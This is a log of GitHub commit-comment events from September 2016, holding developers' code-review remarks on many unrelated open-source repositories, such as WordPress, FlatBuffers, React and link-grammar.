{"id":"4551125701","type":"CommitCommentEvent","actor":{"login":"arthurcf"},"repo":{"name":"cloudflare/cloudflare-plugin-backend"},"payload":{"comment":{"id":18989623,"position":null,"line":null,"path":null,"commit_id":"b5b40bf3b10b5c704003f3f28e4c53b32f66b2d1","created_at":"2016-09-12T18:45:58Z","updated_at":"2016-09-12T18:45:58Z","body":"This change makes the code harder to read and more error prone. It would be really easy to mess up and misunderstand the  \"= $isError ==\" construct. In general you want to be very careful and not be clever with tests and assignments, certainly not try to combine the code into one line like this. Don't be clever, be clear."}},"created_at":"2016-09-12T18:45:58Z"}
{"id":"4551126347","type":"CommitCommentEvent","actor":{"login":"celloexpressions"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18989625,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T18:46:06Z","updated_at":"2016-09-12T18:46:06Z","body":"This needs an `|| is_customize_preview()` for selective refresh to work."}},"created_at":"2016-09-12T18:46:06Z"}
{"id":"4551136309","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18989648,"position":67,"line":53,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T18:47:52Z","updated_at":"2016-09-12T18:47:52Z","body":"You may have accidentally left off the spread operator when passing props to input:\r\n\r\n    return <input {...props} />\r\n\r\nSee: https://facebook.github.io/react/docs/jsx-spread.html"}},"created_at":"2016-09-12T18:47:52Z"}
{"id":"4551143048","type":"CommitCommentEvent","actor":{"login":"vladimir-v-diaz"},"repo":{"name":"awwad/taps"},"payload":{"comment":{"id":18989658,"position":93,"line":93,"path":"tap-0004.md","commit_id":"f92edc63f93ef63c42a0ba6047509d27370ce807","created_at":"2016-09-12T18:49:04Z","updated_at":"2016-09-12T18:49:04Z","body":"A link to Notary's pinning solution would be helpful here."}},"created_at":"2016-09-12T18:49:04Z"}
{"id":"4551144394","type":"CommitCommentEvent","actor":{"login":"4kito"},"repo":{"name":"4kito/GPXSimplify"},"payload":{"comment":{"id":18989665,"position":null,"line":null,"path":null,"commit_id":"3288d9747e878d6f6dc9bde5704a99f49185115e","created_at":"2016-09-12T18:49:18Z","updated_at":"2016-09-12T18:49:18Z","body":"TODO : Utiliser la librairie OpenLayers pour voir si un des modules permet d'écrire un fichier .GPX plus valide que celui qui sort de mon script OU fix ma loop qui ne s'arrête pas"}},"created_at":"2016-09-12T18:49:18Z"}
{"id":"4551147948","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":18989681,"position":null,"line":null,"path":null,"commit_id":"7e6d1a5033885491d33de30c496b2e0fc6d4a1d4","created_at":"2016-09-12T18:49:57Z","updated_at":"2016-09-12T18:49:57Z","body":"I meant, that the description of this repository is \"Chrome extension that replaces occurrences of 'the cloud' with 'my butt'\" right now and that it should be changed. I just commented here, as this is the easiest way of writing something to you (issues are disabled apparently)."}},"created_at":"2016-09-12T18:49:57Z"}
{"id":"4551154015","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"dirkschumacher/ompr"},"payload":{"comment":{"id":18989691,"position":null,"line":null,"path":null,"commit_id":"a594e6cb54b11c81ff21452cf15c43a0874ae244","created_at":"2016-09-12T18:51:04Z","updated_at":"2016-09-12T18:51:04Z","body":"[tests/testthat/test-model.R:325:1:](https://github.com/dirkschumacher/ompr/blob/a594e6cb54b11c81ff21452cf15c43a0874ae244/tests/testthat/test-model.R#L325) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-12T18:51:04Z"}
{"id":"4551165298","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"dirkschumacher/ompr"},"payload":{"comment":{"id":18989717,"position":null,"line":null,"path":null,"commit_id":"a594e6cb54b11c81ff21452cf15c43a0874ae244","created_at":"2016-09-12T18:53:01Z","updated_at":"2016-09-12T18:53:01Z","body":"[tests/testthat/test-model.R:325:1:](https://github.com/dirkschumacher/ompr/blob/a594e6cb54b11c81ff21452cf15c43a0874ae244/tests/testthat/test-model.R#L325) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-12T18:53:01Z"}
{"id":"4551165890","type":"CommitCommentEvent","actor":{"login":"nbey"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18989719,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T18:53:09Z","updated_at":"2016-09-12T18:53:09Z","body":"@themightychris I believe the issue was related to querying -- when joining competencies, the SQL statement would fail because of the ambiguous / common column names between the two models. Maybe ActiveRecord's `mapFieldOrder` method could prepend the appropriate table alias instead?"}},"created_at":"2016-09-12T18:53:09Z"}
{"id":"4551168224","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak-dotnet-client"},"payload":{"comment":{"id":18989723,"position":17,"line":14,"path":"make.ps1","commit_id":"fd3af1f4ee5378e6ae21ad9b50d2d0b44d732a06","created_at":"2016-09-12T18:53:33Z","updated_at":"2016-09-12T18:53:33Z","body":"Should this be `IntegrationTest` with the old verbiage?"}},"created_at":"2016-09-12T18:53:33Z"}
{"id":"4551168755","type":"CommitCommentEvent","actor":{"login":"LifeGold"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18989725,"position":null,"line":null,"path":null,"commit_id":"5c01935ef25f9acce2346026853d1aaec952fdb0","created_at":"2016-09-12T18:53:39Z","updated_at":"2016-09-12T18:53:39Z","body":"Hi. I wanted to ask You have signed as the WhiteCoreSim although we like using and use Virtual Universe"}},"created_at":"2016-09-12T18:53:39Z"}
{"id":"4551170492","type":"CommitCommentEvent","actor":{"login":"zaps166"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":18989729,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-12T18:53:57Z","updated_at":"2016-09-12T18:53:57Z","body":"Aaah, and for Qt4 (and Qt5 < 5.6) the QtOpenGL module is requered for OpenGL video output :)"}},"created_at":"2016-09-12T18:53:57Z"}
{"id":"4551173388","type":"CommitCommentEvent","actor":{"login":"duncanspumpkin"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18989736,"position":null,"line":null,"path":null,"commit_id":"a2bf35eee547426bfa9da17b03d81b89508972da","created_at":"2016-09-12T18:54:28Z","updated_at":"2016-09-12T18:54:28Z","body":"This is still required for the original painting thats why it was kept in. I guess we can probably get rid of it now that there are no bugs though."}},"created_at":"2016-09-12T18:54:28Z"}
{"id":"4551173993","type":"CommitCommentEvent","actor":{"login":"spalladino"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989743,"position":5,"line":80,"path":"resources/planwise/plpgsql/functions.sql","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T18:54:35Z","updated_at":"2016-09-12T18:54:35Z","body":"I understand that here we should be using the *opposite* of the absolute value, since you want to *substract* blocks from the `region_ymax` to calculate the `target_maxy`. \r\n\r\nAnd since `unaligned_target_maxy < region_ymax` should always hold (as `unaligned_target_maxy` is the _least _ between `region_ymax` and another value), the `abs` should not be necessary."}},"created_at":"2016-09-12T18:54:35Z"}
{"id":"4551174777","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18989749,"position":71,"line":59,"path":"src/head_server/schedulers/base scheduler","commit_id":"bf12730fecd5578dd2cb36881ff6212918ca7426","created_at":"2016-09-12T18:54:43Z","updated_at":"2016-09-12T18:54:43Z","body":"Should probably be `RandomSchedulerType extends SchedulerType`"}},"created_at":"2016-09-12T18:54:43Z"}
{"id":"4551178589","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18989754,"position":59,"line":54,"path":"src/head_server/schedulers/base scheduler","commit_id":"bf12730fecd5578dd2cb36881ff6212918ca7426","created_at":"2016-09-12T18:55:23Z","updated_at":"2016-09-12T18:55:23Z","body":"This is a repeat of `num_scheduled` on line 38"}},"created_at":"2016-09-12T18:55:23Z"}
{"id":"4551179180","type":"CommitCommentEvent","actor":{"login":"domien96"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18989755,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T18:55:28Z","updated_at":"2016-09-12T18:55:28Z","body":"Wat stel je dan voor als algoritme?\n\n2016-09-12 19:05 GMT+02:00 GrigoriLomonosov <notifications@github.com>:\n\n> find_pairs(puzzle);\n> avoid_trios(puzzle);\n> complete_RC(puzzle);\n> returnen allemaal 0 als er iets verandert is\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GrigoriLomonosov/BinaryPuzzleSolver/commit/4a596d3e90ff44aba8fd792608243e3b50be0b39#commitcomment-18988149>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJgnK0lmErAPCMVUGa9pm7DRRLAPUTXxks5qpYZugaJpZM4J6Q-9>\n> .\n>\n\n\n\n-- \nMet vriendelijke Groet\nDomien.. :)\n"}},"created_at":"2016-09-12T18:55:28Z"}
{"id":"4551181854","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18989758,"position":13,"line":13,"path":"src/head_server/schedulers/base scheduler","commit_id":"bf12730fecd5578dd2cb36881ff6212918ca7426","created_at":"2016-09-12T18:55:56Z","updated_at":"2016-09-12T18:55:56Z","body":"`mock_clients` might be a better name since its makes it obvious it is a mock value"}},"created_at":"2016-09-12T18:55:56Z"}
{"id":"4551185226","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18989762,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T18:56:31Z","updated_at":"2016-09-12T18:56:31Z","body":"This commit can be useful, can you submit a pull request to [node-argon2](https://github.com/ranisalt/node-argon2)?"}},"created_at":"2016-09-12T18:56:31Z"}
{"id":"4551188853","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18989770,"position":10,"line":10,"path":"src/head_server/schedulers/base scheduler","commit_id":"bf12730fecd5578dd2cb36881ff6212918ca7426","created_at":"2016-09-12T18:57:10Z","updated_at":"2016-09-12T18:57:10Z","body":"Simply for ease of use, the constructor shouldnt take any arguments right now, in the constructor, set the max scheduled and schedule interval to sane values.\r\n\r\nAlso since you spell out schedule and scheduler everywhere else, it would be best to not abbreviate sched"}},"created_at":"2016-09-12T18:57:10Z"}
{"id":"4551194137","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18989784,"position":null,"line":null,"path":null,"commit_id":"5826aa1fe86672cfc4d3cf50f4dfd0ef4346d8aa","created_at":"2016-09-12T18:58:04Z","updated_at":"2016-09-12T18:58:04Z","body":"The following doc(s) have been deployed to the [allenfears](https://allenfears-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/solr](https://allenfears-static-docs.pantheonsite.io/docs/solr)\n"}},"created_at":"2016-09-12T18:58:04Z"}
{"id":"4551195939","type":"CommitCommentEvent","actor":{"login":"domien96"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18989790,"position":null,"line":null,"path":null,"commit_id":"03fcdb0e259be1558de868e7f8c473716d5aa199","created_at":"2016-09-12T18:58:24Z","updated_at":"2016-09-12T18:58:24Z","body":"Dat zou ook kunnen.\nMaar eigenlijk mogen die if's weg aangezien free(NULL) equivalent is aan\neen NOP en geen error opgooit. Er wordt wel een error opgegooid bij\nbepaalde systemen zoals PalmOS, dat heb ik gevonden op internet.\nMaar ik zou het alsnog weglaten, omdat volgens de documentatie free geen\nexceptie mag opgooien als het argument NULL is. Dit maakt het bovendien\nleesbaarder.\n\n2016-09-12 19:08 GMT+02:00 GrigoriLomonosov <notifications@github.com>:\n\n> En waarom doe je dat niet met puzzle->squares en puzzle->transponse?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GrigoriLomonosov/BinaryPuzzleSolver/commit/03fcdb0e259be1558de868e7f8c473716d5aa199#commitcomment-18988212>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJgnK9soatqp-XfySNAfxmxszfaBn-Zhks5qpYb7gaJpZM4J6RNd>\n> .\n>\n\n\n\n-- \nMet vriendelijke Groet\nDomien.. :)\n"}},"created_at":"2016-09-12T18:58:24Z"}
{"id":"4551197056","type":"CommitCommentEvent","actor":{"login":"themightychris"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18989792,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T18:58:36Z","updated_at":"2016-09-12T18:58:36Z","body":"@nbey off the top of my head I don't think there's anyway a handleBrowseRequest query could end up having a join, do you know of a case where it does?"}},"created_at":"2016-09-12T18:58:36Z"}
{"id":"4551198688","type":"CommitCommentEvent","actor":{"login":"rom1v"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18989794,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-12T18:58:56Z","updated_at":"2016-09-12T18:58:56Z","body":"> En fait, l'exposant de type `p-2` est obligatoire.\r\n> Donc, la question du `F` final ne se pose pas.\r\n\r\nOK, merci pour la précision.\r\nDu coup, l'exposant n'est pas exprimé en hexa, j'imagine? :smile: "}},"created_at":"2016-09-12T18:58:56Z"}
{"id":"4551202905","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989801,"position":77,"line":878,"path":"src/idl_gen_cpp.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T18:59:40Z","updated_at":"2016-09-12T18:59:40Z","body":"Values in a table are not guaranteed to be adjacent or in any particular order."}},"created_at":"2016-09-12T18:59:40Z"}
{"id":"4551204276","type":"CommitCommentEvent","actor":{"login":"rpl"},"repo":{"name":"mozilla/web-ext"},"payload":{"comment":{"id":18989805,"position":7,"line":30,"path":"src/program.js","commit_id":"5a5e0a45133b9f96057e45f5ec2a3ecefdbac579","created_at":"2016-09-12T18:59:54Z","updated_at":"2016-09-12T18:59:54Z","body":"yes, it does\r\n(executing `/path/to/web-ext ...<options>` is basically what the new tests in the functional test suite are doing: this way the tests are running the web-ext executable mostly like a regular user does)"}},"created_at":"2016-09-12T18:59:54Z"}
{"id":"4551204711","type":"CommitCommentEvent","actor":{"login":"lesv"},"repo":{"name":"GoogleCloudPlatform/getting-started-java"},"payload":{"comment":{"id":18989806,"position":34,"line":76,"path":"helloworld-jsp/pom.xml","commit_id":"1cae0c439040430a46e50253a5b0ff628381c79e","created_at":"2016-09-12T18:59:59Z","updated_at":"2016-09-12T18:59:59Z","body":"It breaks some Jenkins, what do you mean it breaks maven?"}},"created_at":"2016-09-12T18:59:59Z"}
{"id":"4551206010","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18989808,"position":null,"line":null,"path":null,"commit_id":"f63f18d8417f5ad26520dc639cfab3224a9ee1c6","created_at":"2016-09-12T19:00:15Z","updated_at":"2016-09-12T19:00:15Z","body":"This is a great I did more in 2ef9e04b9d4e8d06daa62220c8549537adf354a0 :smile:"}},"created_at":"2016-09-12T19:00:15Z"}
{"id":"4551207655","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989814,"position":48,"line":1234,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:00:30Z","updated_at":"2016-09-12T19:00:30Z","body":"Having to swap these in-place (and thus temporarily generating an invalid buffer) doesn't seem that great to me."}},"created_at":"2016-09-12T19:00:30Z"}
{"id":"4551211946","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18989824,"position":3,"line":3,"path":"db/migrate/20160911174927_add_name_to_railway_stations.rb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T19:01:15Z","updated_at":"2016-09-12T19:01:15Z","body":"Как-то я упустил этот момент и не проверил работоспособность миграции.\r\nПоправил."}},"created_at":"2016-09-12T19:01:15Z"}
{"id":"4551211953","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989825,"position":59,"line":1245,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:01:15Z","updated_at":"2016-09-12T19:01:15Z","body":"This is not \"host order\", FlatBuffer uses little endian on all platforms."}},"created_at":"2016-09-12T19:01:15Z"}
{"id":"4551214396","type":"CommitCommentEvent","actor":{"login":"ytbmulder"},"repo":{"name":"ytbmulder/language-tie"},"payload":{"comment":{"id":18989832,"position":18,"line":18,"path":"tie.cson","commit_id":"704b38cbb2085c70f6c99e06103f7118d2fe3508","created_at":"2016-09-12T19:01:40Z","updated_at":"2016-09-12T19:01:40Z","body":"@nixel2007 What exactly can be made case-insensitive?"}},"created_at":"2016-09-12T19:01:40Z"}
{"id":"4551214998","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18989835,"position":61,"line":61,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T19:01:46Z","updated_at":"2016-09-12T19:01:46Z","body":"Alright, I buy that argument, stick with your naming"}},"created_at":"2016-09-12T19:01:46Z"}
{"id":"4551216446","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18989840,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T19:02:01Z","updated_at":"2016-09-12T19:02:01Z","body":"the problem with closest exit is that it dosnt guarantee that is valid path. i just run into problem in room E17N59 and E18N59 where are 2 'doors' one blocked by wall. and creeps decided to go closed route.\r\n"}},"created_at":"2016-09-12T19:02:01Z"}
{"id":"4551218578","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989846,"position":null,"line":null,"path":null,"commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:02:25Z","updated_at":"2016-09-12T19:02:25Z","body":"Sure, though you need to add it to the commit. Generated files are part of the repo such that we can easily see the effect of code generator changes."}},"created_at":"2016-09-12T19:02:25Z"}
{"id":"4551220123","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18989850,"position":26,"line":278,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"bad19603d890d10b7a21fa4915798eea4037775b","created_at":"2016-09-12T19:02:42Z","updated_at":"2016-09-12T19:02:42Z","body":"Then I'm probably mistaken, it could also be in Orchestra. Anyways, let's keep it as is for now."}},"created_at":"2016-09-12T19:02:42Z"}
{"id":"4551221568","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"sosiouxme/origin-aggregated-logging"},"payload":{"comment":{"id":18989853,"position":null,"line":null,"path":null,"commit_id":"a5db333217b80e4098a6844c34d961d652944876","created_at":"2016-09-12T19:02:58Z","updated_at":"2016-09-12T19:02:58Z","body":"LGTM"}},"created_at":"2016-09-12T19:02:58Z"}
{"id":"4551222011","type":"CommitCommentEvent","actor":{"login":"tahmmee"},"repo":{"name":"tahmmee/sequoia-provision"},"payload":{"comment":{"id":18989854,"position":null,"line":null,"path":null,"commit_id":"b1300009bc017bd12dae55a524f926d08119f230","created_at":"2016-09-12T19:03:03Z","updated_at":"2016-09-12T19:03:03Z","body":"See Also http://javydekoning.com/killing-service-pending-state/\r\n\r\n\r\n$id = gwmi Win32_Service -Filter \"Name LIKE 'WinRM'\" | select -expand ProcessId\r\nStop-Process -Id $id -Force\r\ngsv winrm | start-service\r\ngsv winrm"}},"created_at":"2016-09-12T19:03:03Z"}
{"id":"4551225138","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18989857,"position":4,"line":4,"path":"tabbycat/draw/templates/admin/draw/debate/change_form.html","commit_id":"2ef9e04b9d4e8d06daa62220c8549537adf354a0","created_at":"2016-09-12T19:03:35Z","updated_at":"2016-09-12T19:03:35Z","body":"@philipbelesky This block (below) is something you might want to review. It does work on Chrome and IE, but my JavaScript isn't really good enough to know if this is acceptable practice.\r\n\r\n(It's obviously not best practice, but that's the nature of hacks like this…)"}},"created_at":"2016-09-12T19:03:35Z"}
{"id":"4551226241","type":"CommitCommentEvent","actor":{"login":"ampli"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18989858,"position":53,"line":535,"path":"link-grammar/dict-file/dictionary.c","commit_id":"e05f475f8cb94f9fda940ac5d4b8dcd23d509b4e","created_at":"2016-09-12T19:03:46Z","updated_at":"2016-09-12T19:03:46Z","body":"What I meant in the original comment:\r\n\r\nThe code caches the dictionary locale as follows: `dict->locale = setlocale(LC_CTYPE, NULL);`\r\nHowever, note that setlocale() **owns the returned memory**, and will **free/overwrite** it on its next call  (setlocale() may be called again later for another dictionary or from the user's application) so `dict->locale` will then get **invalidated**. Hence it is needed to put it in a string_set.\r\n\r\nSo the original comment (\"its next call\", i.e. \"the next call of setlocale()\") is correct.\r\n\r\nBTW, without this string_set_add(), in certain conditions on Windows, link-parser's opening message locale notification contains garbage, because setlocale() got invoked again and freed the memory it had previously returned. On Linux I think it uses static memory and an incorrect locale could be printed."}},"created_at":"2016-09-12T19:03:46Z"}
{"id":"4551226906","type":"CommitCommentEvent","actor":{"login":"johnregan3"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18989861,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T19:03:53Z","updated_at":"2016-09-12T19:03:53Z","body":"This is one of the places where I was running into issues.  When I added the bidirectional data binding in the JS, the preview would refresh twice, and the second time, it would add a something like this:\r\n````\r\n     <style id=\"wp-custom-css\">\r\n          <style id=\"wp-custom-css\">\r\n               ...\r\n          </style>\r\n     </style>\r\n````\r\nPlease correct me if I'm wrong, but I believe because I have the data bound in the JS, it updates automatically without needing selective refresh.  \r\n\r\n@celloexpressions "}},"created_at":"2016-09-12T19:03:53Z"}
{"id":"4551234737","type":"CommitCommentEvent","actor":{"login":"joeduncan"},"repo":{"name":"joeduncan/enzyme"},"payload":{"comment":{"id":18989884,"position":null,"line":null,"path":null,"commit_id":"26c155becae9111a95a5aa2c09a27134161bce0a","created_at":"2016-09-12T19:05:17Z","updated_at":"2016-09-12T19:05:17Z","body":"true"}},"created_at":"2016-09-12T19:05:17Z"}
{"id":"4551239566","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18989900,"position":null,"line":null,"path":null,"commit_id":"2ef9e04b9d4e8d06daa62220c8549537adf354a0","created_at":"2016-09-12T19:06:12Z","updated_at":"2016-09-12T19:06:12Z","body":"@philipbelesky I put them everywhere where I could think of where people can modify DebateTeams. Modification is sufficient to cause harm: someone could change a position so that there are two affirmative teams on a debate.\r\n\r\nMost of it's just adding a bit to overrides of the relevant templates. The inline tabs of Debate are quite tricky though—there's no easy way to override an inline form set template (it doesn't have blocks in it), so I ended up attaching something in jQuery. Jet uses jQuery, but I suppose this makes the message a little fragile, if (say) Jet also tries to transition away from it."}},"created_at":"2016-09-12T19:06:12Z"}
{"id":"4551244914","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18989913,"position":179,"line":253,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-12T19:07:08Z","updated_at":"2016-09-12T19:07:08Z","body":"`NSFetchRequestResult` is actually the name of the new protocol that all the possible return types from the fetch request conform to. So, leaving it as `NSFetchRequestResult` basically just avoids using the new generic support in Core Data. I think really what we're looking for here is something like:\r\n\r\n```\r\nlet request = entity.fetchRequest()\r\n```\r\n\r\nThen, we don't even have to do the type casting below. (this is actually one of the new features that solves one of the problems that DataManager was created to solve)"}},"created_at":"2016-09-12T19:07:08Z"}
{"id":"4551246990","type":"CommitCommentEvent","actor":{"login":"spalladino"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18989917,"position":7,"line":134,"path":"cpp/calculate-demand.cpp","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T19:07:31Z","updated_at":"2016-09-12T19:07:31Z","body":"The value should never be negative, because `demoMaxY` should always be larger than `facilityMaxY` (`blocksY` ends up being positive because the resolution is returned as negative by GDAL), as asserted a few lines before."}},"created_at":"2016-09-12T19:07:31Z"}
{"id":"4551247475","type":"CommitCommentEvent","actor":{"login":"ymkc"},"repo":{"name":"TeoTwawki/darkstar"},"payload":{"comment":{"id":18989919,"position":9,"line":65,"path":"scripts/zones/Attohwa_Chasm/mobs/Sargas.lua","commit_id":"c0046dc1c72a5873d0fe36241dc326b09fbdc3e6","created_at":"2016-09-12T19:07:37Z","updated_at":"2016-09-12T19:07:37Z","body":"reviewing this atm https://github.com/ymkc/darkstar/commit/bb107d7e881ce3aaca178b90bb9957dacea65137\r\nand will pr if it's good enough"}},"created_at":"2016-09-12T19:07:37Z"}
{"id":"4551249367","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18989920,"position":6,"line":58,"path":"tabbycat/draw/models.py","commit_id":"c2fa4e21be81e046d19c0caa6027228f21ecc55f","created_at":"2016-09-12T19:08:00Z","updated_at":"2016-09-12T19:08:00Z","body":"@philipbelesky I added the debate ID to these descriptors—I realized that the descriptions can be non-unique, not just in the same that things might have the same name, but there might be two debates between the same teams and you wouldn't know, because there's no uniqueness constraint on debate-teams. Since `str(debate)` is only used in back-end areas (like Jet and console) (in front-end things it should be `debate.matchup`) I think this should be okay, but let me know if you disagree."}},"created_at":"2016-09-12T19:08:00Z"}
{"id":"4551250037","type":"CommitCommentEvent","actor":{"login":"nicolas-cellier-aka-nice"},"repo":{"name":"estebanlm/opensmalltalk-vm"},"payload":{"comment":{"id":18989921,"position":7,"line":11,"path":"platforms/iOS/vm/SqueakPureObjc_Prefix.pch","commit_id":"fb8ddb4ad3747f547e75a92ac3d7953c480c82a2","created_at":"2016-09-12T19:08:09Z","updated_at":"2016-09-12T19:08:09Z","body":"There's effectively one occurrences for RETAINOBJ and none for RELEASEOBJ in current cog head revision:\r\n\r\n    grep -r '\\<RETAINOBJ\\>' platforms/\r\n\r\nplatforms//iOS/plugins/SqueakObjectiveC/squeakProxy.m:\t\tinvocation = RETAINOBJ(anInvocation);"}},"created_at":"2016-09-12T19:08:09Z"}
{"id":"4551251378","type":"CommitCommentEvent","actor":{"login":"eownis"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18989925,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T19:08:23Z","updated_at":"2016-09-12T19:08:23Z","body":"I already did https://github.com/ranisalt/node-argon2/pull/47"}},"created_at":"2016-09-12T19:08:23Z"}
{"id":"4551251672","type":"CommitCommentEvent","actor":{"login":"schanzer"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18989926,"position":null,"line":null,"path":null,"commit_id":"0247aa65275b8b3f505fd29044f3a0d4f14c26ba","created_at":"2016-09-12T19:08:27Z","updated_at":"2016-09-12T19:08:27Z","body":"I like the idea of running some early stages in realtime -- I experimented with this a bit in WeScheme last year, but decided that the UI work necessary to make it _useful_ was simply beyond me. As with some of the other conversations we've had about this stuff, the trick is to make sure we're setting reasonable expectations. LightTable sank under the weight of some very cool features that didn't generalize, and we don't want to follow suit."}},"created_at":"2016-09-12T19:08:27Z"}
{"id":"4551253178","type":"CommitCommentEvent","actor":{"login":"crism"},"repo":{"name":"pkp/pkp-lib"},"payload":{"comment":{"id":18989929,"position":null,"line":null,"path":null,"commit_id":"9ed15622fce94a95762d89dccbf369ca9d03ccee","created_at":"2016-09-12T19:08:45Z","updated_at":"2016-09-12T19:08:45Z","body":"@NateWr, did the spectrum Javascript and CSS files, get missed in this commit, perhaps?"}},"created_at":"2016-09-12T19:08:45Z"}
